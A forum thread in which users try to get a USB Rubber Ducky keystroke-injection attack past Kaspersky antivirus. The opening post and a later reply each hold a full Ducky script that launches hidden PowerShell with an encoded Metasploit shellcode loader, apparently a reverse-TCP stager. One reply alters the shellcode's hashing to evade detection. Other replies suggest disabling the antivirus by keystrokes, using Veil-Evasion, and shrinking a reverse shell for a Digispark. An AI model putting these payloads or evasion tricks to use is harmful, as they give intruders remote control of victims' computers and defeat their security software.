nullcult Posted July 13, 2016 Share Posted July 13, 2016 Hi guys, i've tried to get past Kaspersky using my rubber ducky but all in vain. Immediately after the ducky writes out the payload i get an access denied and then Kaspersky pops up stating malicious activity. How can i get past this. Below is the script i used. DELAY 5000 GUI r DELAY 1000 STRING cmd ENTER DELAY 1000 STRING powershell -nop -win hidden -noni -enc JABPAFUAawAwACAAPQAgACcAJAB6AFEARQBDACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHoAUQBFAEMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZgBjACwAMAB4AGUAOAAsADAAeAA4ADkALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgAwACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgAMwAxACwAMAB4AGQAMgAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAzADAALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAwAGMALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADQALAAwAHgAOABiACwAMAB4ADcAMgAsADAAeAAyADgALAAwAHgAMABmACwAMAB4AGIANwAsADAAeAA0AGEALAAwAHgAMgA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeABhAGMALAAwAHgAMwBjACwAMAB4ADYAMQAsADAAeAA3AGMALAAwAHgAMAAyACwAMAB4ADIAYwAsADAAeAAyADAALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAMAAxACwAMAB4AGMANwAsADAAeABlADIALAAwAHgAZgAwACwAMAB4ADUAMgAsADAAeAA1ADcALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADAALAAwAHgAOABiACwAMAB4ADQAMgAsADAAeAAzAGMALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4AGIALAAwAHgANAAwACwAMAB4ADcAOAAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeAA0AGEALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA1ADAALAAwAHgAOABiACwAMAB4ADQAOAAsADAAeAAxADgALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAyADAALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeABlADMALAAwAHgAMwBjACwAMAB4ADQAOQAsADAAeAA4AGIALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeABhAGMALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAMAAxACwAMAB4AGMANwAsADAAeAAzADgALAAwAHgAZQAwACwAMAB4ADcANQAsADAAeABmADQALAAwAHgAMAAzACwAMAB4ADcAZAAsADAAeABmADgALAAwAHgAMwBiACwAMAB4ADcAZAAsADAAeAAyADQALAAwAHgANwA1ACwAMAB4AGUAMgAsADAAeAA1ADgALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAyADQALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA2ADYALAAwAHgAOABiACwAMAB4ADAAYwAsADAAeAA0AGIALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAxAGMALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA4AGIALAAwAHgAMAA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAOQAsADAAeAA0ADQALAAwAHgAMgA0ACwAMAB4ADIANAAsADAAeAA1AGIALAAwAHgANQBiACwAMAB4ADYAMQAsADAAeAA1ADkALAAwAHgANQBhACwAMAB4ADUAMQAsADAAeABmAGYALAAwAHgAZQAwACwAMAB4ADUAOAAsADAAeAA1AGYALAAwAHgANQBhACwAMAB4ADgAYgAsADAAeAAxADIALAAwAHgAZQBiACwAMAB4ADgANgAsADAAeAA1AGQALAAwAHgANgA4ACwAMAB4ADMAMwAsADAAeAAzADIALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANwA3ACwAMAB4ADcAMwAsADAAeAAzADIALAAwAHgANQBmACwAMAB4ADUANAAsADAAeAA2ADgALAAwAHgANABjACwAMAB4ADcANwAsADAAeAAyADYALAAwAHgAMAA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAYgA4ACwAMAB4ADkAMAAsADAAeAAwADEALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyADkALAAwAHgAYwA0ACwAMAB4ADUANAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADIAOQAsADAAeAA4ADAALAAwAHgANgBiACwAMAB4ADAAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA0ADAALAAwAHgANQAwACwAMAB4ADQAMAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4AGUAYQAsADAAeAAwAGYALAAwAHgAZABmACwAMAB4AGUAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANwAsADAAeAA2AGEALAAwAHgAMAA1ACwAMAB4ADYAOAAsADAAeABiADIALAAwAHgAMwBlACwAMAB4AGUAOQAsADAAeAAwADkALAAwAHgANgA4ACwAMAB4ADAAMgAsADAAeAAwADAALAAwAHgAMgAwACwAMAB4AGYAYgAsADAAeAA4ADkALAAwAHgAZQA2ACwAMAB4ADYAYQAsADAAeAAxADAALAAwAHgANQA2ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAOQA5ACwAMAB4AGEANQAsADAAeAA3ADQALAAwAHgANgAxACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADQALAAwAHgAMABjACwAMAB4AGYAZgAsADAAeAA0AGUALAAwAHgAMAA4ACwAMAB4ADcANQAsADAAeABlAGMALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANgBhACwAMAB4ADAANAAsADAAeAA1ADYALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAZAA5ACwAMAB4AGMAOAAsADAAeAA1AGYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4AGIALAAwAHgAMwA2ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADYALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADUANgAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAZAA5ACwAMAB4AGMAOAAsADAAeAA1AGYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADIAOQAsADAAeABjADYALAAwAHgAOAA1ACwAMAB4AGYANgAsADAAeAA3ADUALAAwAHgAZQBjACwAMAB4AGMAMwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQASAA4AFEAQQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQASAA4AFEAQQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASAA4AFEAQQAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAE8AVQBrADAAKQApADsAJABDAFgARwA3ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAVABZADQAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAVABZADQAIAAkAEMAWABHADcAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQwBYAEcANwAgACQAZQAiADsAfQA= ENTER Quote Link to comment Share on other sites More sharing options...
axion Posted July 13, 2016 Share Posted July 13, 2016 Is the code that powershell is executing related to metasploit? Quote Link to comment Share on other sites More sharing options...
nullcult Posted July 13, 2016 Author Share Posted July 13, 2016 1 minute ago, axion said: Is the code that powershell is executing related to metasploit? Yes, it's a metasploit payload Quote Link to comment Share on other sites More sharing options...
axion Posted July 13, 2016 Share Posted July 13, 2016 kaspersky uses sandboxing to determine if a program is harmful. It executes the code in a controlled environment to test it before it really executes the program in the normal system. I believe (though i don't really know for sure) that it's looking for a pattern of calls to certain functions, which is why its getting detected. you might need to rewrite the payload somehow, but that could be very hard to do, I'm not sure. Quote Link to comment Share on other sites More sharing options...
nullcult Posted July 13, 2016 Author Share Posted July 13, 2016 3 hours ago, axion said: kaspersky uses sandboxing to determine if a program is harmful. It executes the code in a controlled environment to test it before it really executes the program in the normal system. I believe (though i don't really know for sure) that it's looking for a pattern of calls to certain functions, which is why its getting detected. you might need to rewrite the payload somehow, but that could be very hard to do, I'm not sure. But it's alpha numeric shellcode that i thought runs in memory without touching disk! You recommended rewriting the payload, do you have any references? Thanks Quote Link to comment Share on other sites More sharing options...
axion Posted July 13, 2016 Share Posted July 13, 2016 1 hour ago, nullcult said: But it's alpha numeric shellcode that i thought runs in memory without touching disk! because kaspersky is blocking it, im guessing its able to test powershell.exe being executed with the shellcode. or maybe it works by analyzing the process while its running in memory. 1 hour ago, nullcult said: You recommended rewriting the payload, do you have any references? I have no real idea how you would do this effectively, maybe ask google? Quote Link to comment Share on other sites More sharing options...
Guest Posted July 15, 2016 Share Posted July 15, 2016 Maybe this is too farfetched (I think Axion is right and you need to review your code) but..... Maybe it's worth giving it a try and use Ducky to shut down Kaspersky first? After all they're just keystrokes. Open startmenu, open kaspersky console etc. Quote Link to comment Share on other sites More sharing options...
Guest Posted July 15, 2016 Share Posted July 15, 2016 Also, if this message you get from Kaspersky that says: suspicious activity detected, is there a button or option to allow it? Can't you use the duckyscript to choose that option? Just an idea... Quote Link to comment Share on other sites More sharing options...
datajumper Posted July 17, 2016 Share Posted July 17, 2016 have you tried using Veil-Evasion.py then use the ducky to run it use something like ruby or python shellcode wigs some antiviruses out in some of my exploits that i have tried let me know what you think shellcode method can be awsome at time i would try veil-evasion first if that doesnt work wich it should try a few of them like python rev_tcp winth py installer option or the obfusgating option ruby always works for me avast doesnt see it ive not tried kaspersky but it should get around it try veil and let me know how it worked for you cheers! Quote Link to comment Share on other sites More sharing options...
datajumper Posted July 17, 2016 Share Posted July 17, 2016 but i do like the idea of not touching the hard disk thats awsome less chance of you geting caught if you ar going to use the shellcode method try using the venom shellcode generator it works alot like veil-evasion .. https://sourceforge.net/p/crisp-shellcode-generator/shell/ci/master/tree/ https://sourceforge.net/p/crisp-shellcode-generator/wiki/Home/ Quote Link to comment Share on other sites More sharing options...
fugu Posted July 20, 2016 Share Posted July 20, 2016 this is untested, but I rewrote the hashing that your exploit is using. instead of the ror13 hash that was being used, I changed it to ror12. on virustotal now, kaspersky is unable to detect it, but it could be cause I created a bug that I don't know about in the process, like I said, i haven't tested it. DELAY 5000 GUI r DELAY 1000 STRING cmd ENTER DELAY 1000 STRING powershell -nop -win hidden -noni -enc JE9VazAgPSAnJHpRRUMgPSAnJ1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBWaXJ0dWFsQWxsb2MoSW50UHRyIGxwQWRkcmVzcywgdWludCBkd1NpemUsIHVpbnQgZmxBbGxvY2F0aW9uVHlwZSwgdWludCBmbFByb3RlY3QpO1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBDcmVhdGVUaHJlYWQoSW50UHRyIGxwVGhyZWFkQXR0cmlidXRlcywgdWludCBkd1N0YWNrU2l6ZSwgSW50UHRyIGxwU3RhcnRBZGRyZXNzLCBJbnRQdHIgbHBQYXJhbWV0ZXIsIHVpbnQgZHdDcmVhdGlvbkZsYWdzLCBJbnRQdHIgbHBUaHJlYWRJZCk7W0RsbEltcG9ydCgibXN2Y3J0LmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBtZW1zZXQoSW50UHRyIGRlc3QsIHVpbnQgc3JjLCB1aW50IGNvdW50KTsnJzskdyA9IEFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICR6UUVDIC1OYW1lICJXaW4zMiIgLW5hbWVzcGFjZSBXaW4zMkZ1bmN0aW9ucyAtcGFzc3RocnU7W0J5dGVbXV07W0J5dGVbXV0keiA9IDB4ZmMsMHhlOCwweDg5LDB4MDAsMHgwMCwweDAwLDB4NjAsMHg4OSwweGU1LDB4MzEsMHhkMiwweDY0LDB4OGIsMHg1MiwweDMwLDB4OGIsMHg1MiwweDBjLDB4OGIsMHg1MiwweDE0LDB4OGIsMHg3MiwweDI4LDB4MGYsMHhiNywweDRhLDB4MjYsMHgzMSwweGZmLDB4MzEsMHhjMCwweGFjLDB4M2MsMHg2MSwweDdjLDB4MDIsMHgyYywweDIwLDB4YzEsMHhjZiwweDBjLDB4MDEsMHhjNywweGUyLDB4ZjAsMHg1MiwweDU3LDB4OGIsMHg1MiwweDEwLDB4OGIsMHg0MiwweDNjLDB4MDEsMHhkMCwweDhiLDB4NDAsMHg3OCwweDg1LDB4YzAsMHg3NCwweDRhLDB4MDEsMHhkMCwweDUwLDB4OGIsMHg0OCwweDE4LDB4OGIsMHg1OCwweDIwLDB4MDEsMHhkMywweGUzLDB4NDksMHg4YiwweDM0LDB4OGIsMHgwMSwweGQ2LDB4MzEsMHhmZiwweDMxLDB4YzAsMHhhYywweGMxLDB4Y2YsMHgwYywweDAxLDB4YzcsMHgzOCwweGUwLDB4NzUsMHhmNCwweDAzLDB4N2QsMHhmOCwweDNiLDB4N2QsMHgyNCwweDc1LDB4ZTIsMHg1OCwweDhiLDB4NTgsMHgyNCwweDAxLDB4ZDMsMHg2NiwweDhiLDB4MGMsMHg0YiwweDhiLDB4NTgsMHgxYywweDAxLDB4ZDMsMHg4YiwweDA0LDB4OGIsMHgwMSwweGQwLDB4ODksMHg0NCwweDI0LDB4MjQsMHg1YiwweDViLDB4NjEsMHg1OSwweDVhLDB4NTEsMHhmZiwweGUwLDB4NTgsMHg1ZiwweDVhLDB4OGIsMHgxMiwweGViLDB4ODYsMHg1ZCwweDY4LDB4MzMsMHgzMiwweDAwLDB4MDAsMHg2OCwweDc3LDB4NzMsMHgzMiwweDVmLDB4NTQsMHg2OCwweDk2LDB4Y2UsMHhmMSwweDQ4LDB4ZmYsMHhkNSwweGI4LDB4OTAsMHgwMSwweDAwLDB4MDAsMHgyOSwweGM0LDB4NTQsMHg1MCwweDY4LDB4YzUsMHgzZiwweGIyLDB4ZDYsMHhmZiwweGQ1LDB4NTAsMHg1MCwweDUwLDB4NTAsMHg0MCwweDUwLDB4NDAsMHg1MCwweDY4LDB4ZTQsMHgzZSwweGJiLDB4ZGUsMHhmZiwweGQ1LDB4OTcsMHg2YSwweDA1LDB4NjgsMHhiMiwweDNlLDB4ZTksMHgwOSwweDY4LDB4MDIsMHgwMCwweDIwLDB4ZmIsMHg4OSwweGU2LDB4NmEsMHgxMCwweDU2LDB4NTcsMHg2OCwweDUzLDB4ZDcsMHhiZSwweGRjLDB4ZmYsMHhkNSwweDg1LDB4YzAsMHg3NCwweDBjLDB4ZmYsMHg0ZSwweDA4LDB4NzUsMHhlYywweDY4LDB4OGIsMHg0ZiwweDE2LDB4ZWMsMHhmZiwweGQ1LDB4NmEsMHgwMCwweDZhLDB4MDQsMHg1NiwweDU3LDB4NjgsMHg3MywweGEwLDB4ZGMsMHg2ZCwweGZmLDB4ZDUsMHg4YiwweDM2LDB4NmEsMHg0MCwweDY4LDB4MDAsMHgxMCwweDAwLDB4MDAsMHg1NiwweDZhLDB4MDAsMHg2OCwweGFlLDB4NTIsMHgyNiwweDk2LDB4ZmYsMHhkNSwweDkzLDB4NTMsMHg2YSwweDAwLDB4NTYsMHg1MywweDU3LDB4NjgsMHgwMiwweGQ5LDB4YzgsMHg1ZiwweGZmLDB4ZDUsMHgwMSwweGMzLDB4MjksMHhjNiwweDg1LDB4ZjYsMHg3NSwweGVjLDB4YzM7JGcgPSAweDEwMDA7aWYgKCR6Lkxlbmd0aCAtZ3QgMHgxMDAwKXskZyA9ICR6Lkxlbmd0aH07JEg4UUE9JHc6OlZpcnR1YWxBbGxvYygwLCRnLDB4MTAwMCwweDQwKTtmb3IgKCRpPTA7JGkgLWxlICgkei5MZW5ndGgtMSk7JGkrKykgeyR3OjptZW1zZXQoW0ludFB0cl0oJEg4UUEuVG9JbnQzMigpKyRpKSwgJHpbJGldLCAxKX07JHc6OkNyZWF0ZVRocmVhZCgwLDAsJEg4UUEsMCwwLDApO2ZvciAoOzspe1N0YXJ0LXNsZWVwIDYwfTsnOyRlID0gW1N5c3RlbS5Db252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRCeXRlcygkT1VrMCkpOyRDWEc3ID0gIi1lbmMgIjtpZihbSW50UHRyXTo6U2l6ZSAtZXEgOCl7JFRZNCA9ICRlbnY6U3lzdGVtUm9vdCArICJcc3lzd293NjRcV2luZG93c1Bvd2VyU2hlbGxcdjEuMFxwb3dlcnNoZWxsIjtpZXggIiYgJFRZNCAkQ1hHNyAkZSJ9ZWxzZXs7aWV4ICImIHBvd2Vyc2hlbGwgJENYRzcgJGUiO30K ENTER Quote Link to comment Share on other sites More sharing options...
Source_Writer Posted August 10, 2016 Share Posted August 10, 2016 Any recent feedback about that problem ? Quote Link to comment Share on other sites More sharing options...
datajumper Posted June 18, 2017 Share Posted June 18, 2017 On 7/20/2016 at 5:12 PM, fugu said: this is untested, but I rewrote the hashing that your exploit is using. instead of the ror13 hash that was being used, I changed it to ror12. on virustotal now, kaspersky is unable to detect it, but it could be cause I created a bug that I don't know about in the process, like I said, i haven't tested it. DELAY 5000 GUI r DELAY 1000 STRING cmd ENTER DELAY 1000 STRING powershell -nop -win hidden -noni -enc JE9VazAgPSAnJHpRRUMgPSAnJ1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBWaXJ0dWFsQWxsb2MoSW50UHRyIGxwQWRkcmVzcywgdWludCBkd1NpemUsIHVpbnQgZmxBbGxvY2F0aW9uVHlwZSwgdWludCBmbFByb3RlY3QpO1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBDcmVhdGVUaHJlYWQoSW50UHRyIGxwVGhyZWFkQXR0cmlidXRlcywgdWludCBkd1N0YWNrU2l6ZSwgSW50UHRyIGxwU3RhcnRBZGRyZXNzLCBJbnRQdHIgbHBQYXJhbWV0ZXIsIHVpbnQgZHdDcmVhdGlvbkZsYWdzLCBJbnRQdHIgbHBUaHJlYWRJZCk7W0RsbEltcG9ydCgibXN2Y3J0LmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBtZW1zZXQoSW50UHRyIGRlc3QsIHVpbnQgc3JjLCB1aW50IGNvdW50KTsnJzskdyA9IEFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICR6UUVDIC1OYW1lICJXaW4zMiIgLW5hbWVzcGFjZSBXaW4zMkZ1bmN0aW9ucyAtcGFzc3RocnU7W0J5dGVbXV07W0J5dGVbXV0keiA9IDB4ZmMsMHhlOCwweDg5LDB4MDAsMHgwMCwweDAwLDB4NjAsMHg4OSwweGU1LDB4MzEsMHhkMiwweDY0LDB4OGIsMHg1MiwweDMwLDB4OGIsMHg1MiwweDBjLDB4OGIsMHg1MiwweDE0LDB4OGIsMHg3MiwweDI4LDB4MGYsMHhiNywweDRhLDB4MjYsMHgzMSwweGZmLDB4MzEsMHhjMCwweGFjLDB4M2MsMHg2MSwweDdjLDB4MDIsMHgyYywweDIwLDB4YzEsMHhjZiwweDBjLDB4MDEsMHhjNywweGUyLDB4ZjAsMHg1MiwweDU3LDB4OGIsMHg1MiwweDEwLDB4OGIsMHg0MiwweDNjLDB4MDEsMHhkMCwweDhiLDB4NDAsMHg3OCwweDg1LDB4YzAsMHg3NCwweDRhLDB4MDEsMHhkMCwweDUwLDB4OGIsMHg0OCwweDE4LDB4OGIsMHg1OCwweDIwLDB4MDEsMHhkMywweGUzLDB4NDksMHg4YiwweDM0LDB4OGIsMHgwMSwweGQ2LDB4MzEsMHhmZiwweDMxLDB4YzAsMHhhYywweGMxLDB4Y2YsMHgwYywweDAxLDB4YzcsMHgzOCwweGUwLDB4NzUsMHhmNCwweDAzLDB4N2QsMHhmOCwweDNiLDB4N2QsMHgyNCwweDc1LDB4ZTIsMHg1OCwweDhiLDB4NTgsMHgyNCwweDAxLDB4ZDMsMHg2NiwweDhiLDB4MGMsMHg0YiwweDhiLDB4NTgsMHgxYywweDAxLDB4ZDMsMHg4YiwweDA0LDB4OGIsMHgwMSwweGQwLDB4ODksMHg0NCwweDI0LDB4MjQsMHg1YiwweDViLDB4NjEsMHg1OSwweDVhLDB4NTEsMHhmZiwweGUwLDB4NTgsMHg1ZiwweDVhLDB4OGIsMHgxMiwweGViLDB4ODYsMHg1ZCwweDY4LDB4MzMsMHgzMiwweDAwLDB4MDAsMHg2OCwweDc3LDB4NzMsMHgzMiwweDVmLDB4NTQsMHg2OCwweDk2LDB4Y2UsMHhmMSwweDQ4LDB4ZmYsMHhkNSwweGI4LDB4OTAsMHgwMSwweDAwLDB4MDAsMHgyOSwweGM0LDB4NTQsMHg1MCwweDY4LDB4YzUsMHgzZiwweGIyLDB4ZDYsMHhmZiwweGQ1LDB4NTAsMHg1MCwweDUwLDB4NTAsMHg0MCwweDUwLDB4NDAsMHg1MCwweDY4LDB4ZTQsMHgzZSwweGJiLDB4ZGUsMHhmZiwweGQ1LDB4OTcsMHg2YSwweDA1LDB4NjgsMHhiMiwweDNlLDB4ZTksMHgwOSwweDY4LDB4MDIsMHgwMCwweDIwLDB4ZmIsMHg4OSwweGU2LDB4NmEsMHgxMCwweDU2LDB4NTcsMHg2OCwweDUzLDB4ZDcsMHhiZSwweGRjLDB4ZmYsMHhkNSwweDg1LDB4YzAsMHg3NCwweDBjLDB4ZmYsMHg0ZSwweDA4LDB4NzUsMHhlYywweDY4LDB4OGIsMHg0ZiwweDE2LDB4ZWMsMHhmZiwweGQ1LDB4NmEsMHgwMCwweDZhLDB4MDQsMHg1NiwweDU3LDB4NjgsMHg3MywweGEwLDB4ZGMsMHg2ZCwweGZmLDB4ZDUsMHg4YiwweDM2LDB4NmEsMHg0MCwweDY4LDB4MDAsMHgxMCwweDAwLDB4MDAsMHg1NiwweDZhLDB4MDAsMHg2OCwweGFlLDB4NTIsMHgyNiwweDk2LDB4ZmYsMHhkNSwweDkzLDB4NTMsMHg2YSwweDAwLDB4NTYsMHg1MywweDU3LDB4NjgsMHgwMiwweGQ5LDB4YzgsMHg1ZiwweGZmLDB4ZDUsMHgwMSwweGMzLDB4MjksMHhjNiwweDg1LDB4ZjYsMHg3NSwweGVjLDB4YzM7JGcgPSAweDEwMDA7aWYgKCR6Lkxlbmd0aCAtZ3QgMHgxMDAwKXskZyA9ICR6Lkxlbmd0aH07JEg4UUE9JHc6OlZpcnR1YWxBbGxvYygwLCRnLDB4MTAwMCwweDQwKTtmb3IgKCRpPTA7JGkgLWxlICgkei5MZW5ndGgtMSk7JGkrKykgeyR3OjptZW1zZXQoW0ludFB0cl0oJEg4UUEuVG9JbnQzMigpKyRpKSwgJHpbJGldLCAxKX07JHc6OkNyZWF0ZVRocmVhZCgwLDAsJEg4UUEsMCwwLDApO2ZvciAoOzspe1N0YXJ0LXNsZWVwIDYwfTsnOyRlID0gW1N5c3RlbS5Db252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRCeXRlcygkT1VrMCkpOyRDWEc3ID0gIi1lbmMgIjtpZihbSW50UHRyXTo6U2l6ZSAtZXEgOCl7JFRZNCA9ICRlbnY6U3lzdGVtUm9vdCArICJcc3lzd293NjRcV2luZG93c1Bvd2VyU2hlbGxcdjEuMFxwb3dlcnNoZWxsIjtpZXggIiYgJFRZNCAkQ1hHNyAkZSJ9ZWxzZXs7aWV4ICImIHBvd2Vyc2hlbGwgJENYRzcgJGUiO30K ENTER after STRING powershell -nop -win hidden -noni -enc then add shellcode .........can that be converted to digispark ....like using duckuino converter?? im having problems adding my shellcode due to lack of space on the digispark is there any examples you can give me i just need a small reverse_tcp script to run on the digispark would you care to help me ? some guys on here gave me a few examples but when i use msfvenom to generate the shellcode its way to big i need help either to make it smaller or another method all together and plz keep in mind even tho ive been using metasploit 4 a while im still a noob with all of this rubberducky and digispark programming stuff ...a copy and paste example would be nice lol the saying goes bigger is always better lol not in this case i need smaller Quote Link to comment Share on other sites More sharing options...
